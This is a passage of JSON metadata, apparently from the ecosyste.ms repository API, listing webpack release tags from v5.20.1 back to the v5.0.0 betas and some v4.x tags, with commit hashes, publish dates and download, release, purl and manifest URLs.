ack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e8